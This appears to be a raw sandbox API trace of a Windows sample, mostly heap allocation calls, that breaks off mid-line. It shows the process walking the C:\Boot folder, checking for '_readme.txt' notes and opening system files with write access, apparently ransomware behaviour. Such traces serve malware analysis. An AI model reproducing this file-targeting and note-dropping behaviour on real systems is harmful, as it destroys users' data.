[0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.226] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.226] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.226] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.226] PathFindFileNameW (pszPath="") returned="" [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.226] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.226] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.226] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.227] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.227] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.227] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.227] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.227] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.227] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0058.227] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.228] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.228] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned=".txt" [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.228] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.228] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.228] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.228] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 